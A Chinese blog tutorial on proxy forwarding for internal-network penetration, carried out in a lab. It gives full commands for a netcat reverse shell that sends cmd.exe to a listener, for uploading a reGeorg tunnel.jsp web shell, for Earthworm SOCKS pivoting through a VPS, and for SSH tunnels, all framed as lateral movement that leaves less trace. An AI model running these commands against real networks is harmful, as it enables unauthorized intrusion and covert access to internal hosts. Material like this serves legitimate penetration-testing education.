内网渗透之代理转发

迈不过友情╰ 2021-09-07 06:01 711阅读 0赞

**目录**

0x01前言

0x02 正向和反向代理

0x02.1正向代理(Forward Proxy)

0x02.2反向代理(Reverse Proxy)

0x03 Socks协议

0x04 Natcat

0x05 reGeorg+Proxychains

0x06 Earthworm+Proxychains

0x06.1 正向SOCKS5服务器

0x06.2 反弹SOCKS5服务器

0x06.3 二级网络环境(有公网IP)

0x06.4 二级网络环境(无公网IP)

0x07 ssh隧道代理转发

0x07.1 ssh本地转发

0x07.2 ssh远程转发

0x07.3 ssh动态转发

--------------------

## 0x01前言 ##

谈到内网转发，在我们日常的渗透测试过程中经常会用到端口转发，可以利用代理脚本将内网的流量代理到本地进行访问，这样极大的方便了我们对内网进行横向渗透。

那为什么不直接通过登陆服务器来对内网中其他机器进行渗透，而是通过内网转发呢？意义何在呢？

因为.........

大部分时候拿到权限不够，无法直接登录

而且如果在内网服务器中进行操作，我们需要上传工具进行很多操作，如果服务器缺少对应的环境变量或者组件，会导致渗透受阻。

而且直接远程登录会留下比较明显的痕迹。

因此内网转发是我们最好的选择，在本地进行操作是最方便的，也比较安全~~~

说这么多，不知道大家有没有听过"代理"这个词，这个东西和我们要说的内网转发有很大的关系~

## 0x02 正向和反向代理 ##

那接下来咱们唠一下什么是正向/反向代理？

正向代理中，Proxy和Client同属一个区域，对Server是透明的； 反向代理中，Proxy和Server同属一个区域，对Client透明。 但其实这不管是正向还是反向代理都有一个共同的特点，都是代替收发请求和响应，不过从结构上来看正好左右互换了下，所以把前者那种代理方式叫做正向代理，后面那个玩意叫做反向代理。

![61ed26cd56d49a11e32f71bb62e1ae0a.png][]

### 0x02.1正向代理(Forward Proxy) ###

![03f3ef29684642aa1d33716347b0fc94.png][]

Lhost- ->proxy－－>Rhost

Lhost为了访问到Rhost，向proxy发送了一个请求并且指定目标是Rhost，然后proxy向Rhost转交请求并将获得的内容返回给Lhost，简单来说正向代理就是proxy代替了我们去访问Rhost。

### 0x02.2反向代理(Reverse Proxy) ###

![00354da114801658639cd464eb1c834e.png][]

Lhost<--->proxy<--->firewall<--->Rhost

和正向代理相反（废话），一般情况下，防火墙肯定不能让外网机器随便访问地访问内网机器，所以就提出反向代理。

Lhost只向proxy发送普通的请求，具体让他转到哪里，proxy自己判断，然后将返回的数据递交回来，这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透。

![f1a912cf420f9a9e86a4434a5a0ee916.png][]

简单区分

正向代理的是客户端，反向代理的是服务端，可以理解为正向代理是就比如年少时期喜欢那个Ta，当时很羞涩需要我自己(Lhost)写一份信(proxy)去告诉Ta，反向代理就是喜欢的那个Ta(Rhost)知道并且主动(proxy)过来告诉自己(Lhost)。

有人要问了，代理本质又是基于什么"何方神圣"呢？

那就是Socks协议~~

## 0x03 Socks协议 ##

什么是Socks协议？？

中文意思：防火墙安全会话转换协议，工作在OSI参考模型的**第5层（会话层）**

![c3c44c82923fbadbea4994dbfcbdf23c.png][]

它是一种可以穿透防火墙的协议，很多场景都会用到。比如Fan墙，你们懂得~~

因为Socks介于传输层与表示层之间，使用TCP协议传输数据，因而**不提供如传递ICMP信息**之类的网络层相关服务。

目前有两个版本：SOCKS4和SOCKS5

SOCKS4支持TELNET、FTPHTTP等TCP协议；

SOCKS5支持TCP与UDP，并支持安全认证方案。

Ps: Socks不支持ICMP，不能使用ping命令。。记住哦~~~

**当然啦，基于socks的转发代理有很多的实用的小工具，少侠看图吧~**

常见的转发工具及不同平台的代理链工具：

![3b5e23d6f6e7db9d3cd49624297019d1.png][]

这些工具能对我们内网横向渗透产生什么效果呢？接下来就开始进行一波模拟实战吧~

![f46b540b3c334fe1e2d6331462a7be65.png][]

## 0x04 Natcat ##

让我们的神器出手--瑞士军Dao，也叫NC，小巧强悍，主要作用就是用来反弹shell。

主机A：192.168.153.138

主机B：192.168.153.140

**正向连接**

在主机A执行nc -l -p 5555 -t -e cmd.exe

\-t是通过telnet模式执行 cmd.exe 程序，可以省略

![15f43781121cc0073502b1ffff1080ae.png][]

在主机B执行nc -nvv 192.168.153.138 5555

![156da862bdd61bbda594b1b16d43744d.png][]

**反向连接**

在主机B监听nc -lp 5555

![33e5d84b10ce4fb5aeb934e9d66db447.png][]

在主机A反弹nc -t -e cmd 192.168.153.140 5555

![b9979364ce486cc30d015540ad804c8f.png][]

## 0x05 reGeorg+Proxychains ##

reGeorg是reDuh的升级版，主要是把内网服务器的端口通过http/https隧道转发到本机。

1.上传reGeorg的tunnel.jsp到web主机A。访问链接，并转发到本地端口。

![77c26ea05c801dadd75b7fbf7955e7c5.png][]

主机B以python环境运行：

python reGeorgSocksProxy.py -p 1080 -u [http://192.168.153.137/tunnel.jsp][http_192.168.153.137_tunnel.jsp]

![8dcb3d4a46701a79902ee9708105a73e.png][]

使用设置proxychains的代理端口，进行访问，一般配合nmap和metasploit进行后续内网渗透。

Ps：socks4版本协议不支持udp和icmp协议，所以使用nmap要加上-sT -Pn即使用tcp协议且不使用icmp协议。

![50e7cf3a27f16835856f3549f09e1223.png][]

## 0x06 Earthworm+Proxychains ##

EW 是一套便携式的网络穿透工具，具有SOCKSv5服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透。

该工具能够以"正向"、"反向"、"多级级联"等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。

支持 Linux、Windows、MacOS、Arm-Linux 均被包括其内，强烈推荐使用。

![9f9942418853db21be6ebdaa4a5e2bfd.png][]

该工具借用了 ssocks 和 lcx.exe 的操作逻辑，并进行更多的功能强化。

目前工具提供六种链路状态，可通过 -s 参数进行选定，分别为:

ssocksd rcsocks rssocks

lcx\_slave lcx\_tran lcx\_listen

其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供，分别对应正向与反向socks代理。

其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。

lcx 类别管道：

lcx\_slave 该管道一侧通过反弹方式连接代理请求方，另一侧连接代理提供主机。

lcx\_tran 该管道，通过监听本地端口接收代理请求，并转交给代理提供主机。

lcx\_listen 该管道，通过监听本地端口接收数据，并将其转交给目标网络回连的代理提供主机。

通过组合lcx类别管道的特性，可以实现多层内网环境下的渗透测试。

### 0x06.1 正向SOCKS5服务器 ###

当目标网络边界存在公网IP且可任意开监听端口

./ew\_for\_Win.exe -s ssocksd -l 8888

![26f0a56c6cba5d4794c05b2c10d9b714.png][]

上述命令是在该机器（192.168.153.140）开启一个8888的正向连接端口。

然后其它主机可通过设置代理为192.168.153.140:8888添加这个代理，这里使用的是proxychains。

![e518609b1c872460687e99a865a74986.png][]

### 0x06.2 反弹SOCKS5服务器 ###

当目标网络边界不存在公网IP，通过反弹方式创建socks代理。

先在一台具有公网 ip 的主机A上运行以下命令

./ew\_for\_linux64 -s rcsocks -l 1080 -e 8888

![2f911fa2992ff1a7eded9f2e32634b6d.png][]

意思是在我们公网VPS上添加一个转接隧道，把1080端口收到的代理请求转交给8888端口

在目标主机B上启动SOCKS5服务 并反弹到公网主机的8888端口

ew\_for\_Win.exe -s rssocks -d 192.168.153.129 -e 8888

![26c7bcd7e1c0002e14f9d630f269638d.png][]

本地主机（192.168.153.129）然后通过添加公网192.168.153.129:1080这个代理,来访问内网机器（192.168.153.129）

当然如果本地主机如果是公网ip，就可以把在公网执行的步骤放在本地执行即可。

![37786601a19005d8172be36bb17a8a63.png][]

### 0x06.3 二级网络环境(有公网IP) ###

假设我们获得了右侧A主机和B主机的控制权限，A主机配有2块网卡，一块10.129.72.168连通外网，一块192.168.153.140只能连接内网B主机，无法访问内网其它资源。B主机可以访问内网资源，但无法访问外网。

![7e142f67204acdeec4be1d3421b15951.png][]

先上传ew到B主机，利用ssocksd方式启动8888端口的SOCKS代理，命令如下

ew\_for\_Win.exe -s ssocksd -l 8888

然后在A主机执行

ew\_for\_Win.exe -s lcx\_tran -l 1080 -f 192.168.153.138 -g 8888

![32d2d5fb35133ed3a658ff1c2d03a20d.png][]

含义是将1080端口收到的代理请求转交给B主机（192.168.153.138）的8888端口

然后MyPc就可以通过A的外网代理10.129.72.168:1080访问B。

![0a3fbd505a242a72c25df023f18ed5d2.png][]

### 0x06.4 二级网络环境(无公网IP) ###

假设我们获得了右侧A主机和B主机的控制权限，A主机（NAT）没有公网IP，也无法访问内网资源。B主机可以访问内网资源，但无法访问外网。

![ae33b86c440e515dd908912d09a28b82.png][]

这次操作有四步：

1.在公网vps（45.xxx.xxx.72）添加转接隧道，将10800端口收到的代理请求转交给8888端口

./ew\_for\_linux64 -s lcx\_listen -l 10800 -e 8888

![80bc07eeaf7472999ef2b55e0e596791.png][]

2.B主机（192.168.153.138）主机正向开启8888端口

./ew\_for\_Win.exe -s ssocksd -l 9999

![da24edda05a58e8e28abf04f659a99ea.png][]

3.A主机利用lcx\_slave方式，将公网VPS的888端口和B主机的999端口连接起来

./ew\_for\_Win.exe -s lcx\_slave -d 45.xxx.xxx.72 -e 8888 -f 192.168.153.138 -g 9999

![ad66f97507ef8ecc4fc82198d20886e3.png][]

现在MyPC可通过访问45.xxx.xxx.72:10800来使用192.168.153.138主机提供的socks5代理，代理成功，vps会有rssocks cmd\_socket OK!提示

![b5911e2e58e6ca24f229121ac8e04a3f.png][]

![5ffa70ce9569c32bf164a245cc9b5186.png][]

## 0x07 ssh隧道代理转发 ##

ssh有三个强大的端口转发命令，分别是本地转发、远程转发、动态转发。

socks代理:

ssh -qTfnN -D port remotehost

参数详解：

\-C 允许压缩数据

\-q 安静模式

\-T不占用 shell

\-f 后台运行，并推荐加上 -n 参数

\-N不执行远程命令

\-g允许远端主机连接本地转发的端口

\-n把 stdin 重定向到 /dev/null (防止从 stdin 读取数据)

\-L port:host :hostport 正向代理

//将本地机(客户机)的某个端口转发到远端指定机器的指定端口

\-R port:host :hostport 反向代理

//将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口

\-D port socks5代理

//指定一个本地机器 "动态" 应用程序端口转发

### 0x07.1 ssh本地转发 ###

远程管理服务器上的mysql，mysql不能直接root用户远程登陆。这时候就可以通过本地转发，通过ssh将服务器的3306端口转发到本地1234端口实现以root用户远程登陆mysql。

ssh -CfNg -L <本机地址>:<本机端口>:<目标B地址>:<目标B端口> [用户名@跳板IP(A)][IP_A]

ssh -CfNg -L 1234:127.0.0.1:3306 root@45.XX.XX.X21

![876893ce1fa75a4b0d091d0e607389ca.png][]

### 0x07.2 ssh远程转发 ###

内网的服务器，外网不能直接访问，使用远程转发，将内网的服务器端口转发到外网端口。这时候访问外网的端口，就可以直接访问到了内网的端口。

ssh -CfNg -R <本地端口>:<目标B地址>:<目标B端口> [用户名@本地IP][IP]

ssh -CfNg -R 81:127.0.0.1:80 root@192.168.153.142

![6a3f402745591bb26f5a23f8e443adc5.png][]

现在在192.168.153.142访问127.0.0.1:81就是访问内网的服务器的80端口。

![0ab3dae9e66695e7172e080d46da5e0e.png][]

### 0x07.3 ssh动态转发 ###

远端服务器有限制隔离，本地主机无法直接访问，需要将一台可以访问远端服务器的主机作为跳板，设置为代理端，来代理访问不能访问的资源。

ssh -qTfnN -D <本地端口> [用户名@跳板IP(A)][IP_A]

ssh -qTfnN -D 1080 root@45.XX.XX.X21

![435c3778df3ab01276d2a2dd3bbd693b.png][]

本地Proxychains配置socks4 127.0.0.1:1080

![63fd41563bcb978109be9aad13b42743.png][]

[61ed26cd56d49a11e32f71bb62e1ae0a.png]: /images/20210728/1aa0c394be4c4ee2b51d1d7a813fde66.png
[03f3ef29684642aa1d33716347b0fc94.png]: /images/20210728/d4546ec6c7d94796808b6384710193a5.png
[00354da114801658639cd464eb1c834e.png]: /images/20210728/f142fdaea66f4bf8b46878d50ed85b1f.png
[f1a912cf420f9a9e86a4434a5a0ee916.png]: /images/20210728/41f493de94c94d4eb0b0671eaf02850e.png
[c3c44c82923fbadbea4994dbfcbdf23c.png]: /images/20210728/6ef15f1606464fefa5d41d9fcaf0f91c.png
[3b5e23d6f6e7db9d3cd49624297019d1.png]: /images/20210728/2da2ea4ce3534c00add0dcaff1b2c1b1.png
[f46b540b3c334fe1e2d6331462a7be65.png]: /images/20210728/ccb80fd1a7a645789eec29d3881796c3.png
[15f43781121cc0073502b1ffff1080ae.png]: /images/20210728/5327d2cea73a4e489da43a4de35dd645.png
[156da862bdd61bbda594b1b16d43744d.png]: /images/20210728/0fbe4994c5fe48188ab6c253e163ba68.png
[33e5d84b10ce4fb5aeb934e9d66db447.png]: /images/20210728/80cb5bac889c4d0c8830ac21ea814bd5.png
[b9979364ce486cc30d015540ad804c8f.png]: /images/20210728/84f8e405c3974b92864bd70022d14eda.png
[77c26ea05c801dadd75b7fbf7955e7c5.png]: /images/20210728/a69b1658bf7247899e8775c2447a6669.png
[http_192.168.153.137_tunnel.jsp]: http://192.168.153.137/tunnel.jsp
[8dcb3d4a46701a79902ee9708105a73e.png]: /images/20210728/343df4c164374b7ba5a7a0c6ba2e5200.png
[50e7cf3a27f16835856f3549f09e1223.png]: /images/20210728/452f551dcb9e48908d0ad5cb843ff9f8.png
[9f9942418853db21be6ebdaa4a5e2bfd.png]: /images/20210728/6a5c68656a674947bcde0ae9fc2fa1da.png
[26f0a56c6cba5d4794c05b2c10d9b714.png]: /images/20210728/1a3cb6d16f5e4fc7bc59a0263eef0d26.png
[e518609b1c872460687e99a865a74986.png]: /images/20210728/70da7738e4f04599b61aefcb2c4792b1.png
[2f911fa2992ff1a7eded9f2e32634b6d.png]: /images/20210728/dca0964090854f2f8342f2da010e9195.png
[26c7bcd7e1c0002e14f9d630f269638d.png]: /images/20210728/00ea5c74a11749f88773b6228db97773.png
[37786601a19005d8172be36bb17a8a63.png]: /images/20210728/b57afce1fdd241b38cc97e167787e7b6.png
[7e142f67204acdeec4be1d3421b15951.png]: /images/20210728/f946ae068fbb44af88bc02b573848264.png
[32d2d5fb35133ed3a658ff1c2d03a20d.png]: /images/20210728/238592fabf2144dba7cd94d6bc5b8b15.png
[0a3fbd505a242a72c25df023f18ed5d2.png]: /images/20210728/2ad83cb6d4f4461b8699ba17d298862c.png
[ae33b86c440e515dd908912d09a28b82.png]: /images/20210728/9a936202c665436eb2db88fc96c4ac46.png
[80bc07eeaf7472999ef2b55e0e596791.png]: /images/20210728/e1486ca6548f4510955499097e6f64e2.png
[da24edda05a58e8e28abf04f659a99ea.png]: /images/20210728/6ae3f7a6b7c043d29530388c7a45df4e.png
[ad66f97507ef8ecc4fc82198d20886e3.png]: /images/20210728/71d4ee37ecdf4f4bb5084512112f5fc3.png
[b5911e2e58e6ca24f229121ac8e04a3f.png]: /images/20210728/e4651568b90c4ec19cf2c3908a632d63.png
[5ffa70ce9569c32bf164a245cc9b5186.png]: /images/20210728/79a4217d76c2411f81f7481b20b51d69.png
[IP_A]: mailto:%E7%94%A8%E6%88%B7%E5%90%8D@%E8%B7%B3%E6%9D%BFIP%28A%29
[876893ce1fa75a4b0d091d0e607389ca.png]: /images/20210728/3f358046feea40b9892450632db1728c.png
[IP]: mailto:%E7%94%A8%E6%88%B7%E5%90%8D@%E6%9C%AC%E5%9C%B0IP
[6a3f402745591bb26f5a23f8e443adc5.png]: /images/20210728/773c7a6f67314cb6979f59170f6ad08d.png
[0ab3dae9e66695e7172e080d46da5e0e.png]: /images/20210728/41896b40cc94448f851a2d7340972786.png
[435c3778df3ab01276d2a2dd3bbd693b.png]: /images/20210728/f62850884d954be4a52843dfa48fb287.png
[63fd41563bcb978109be9aad13b42743.png]: /images/20210728/5f11577b725d4aea980e413504113921.png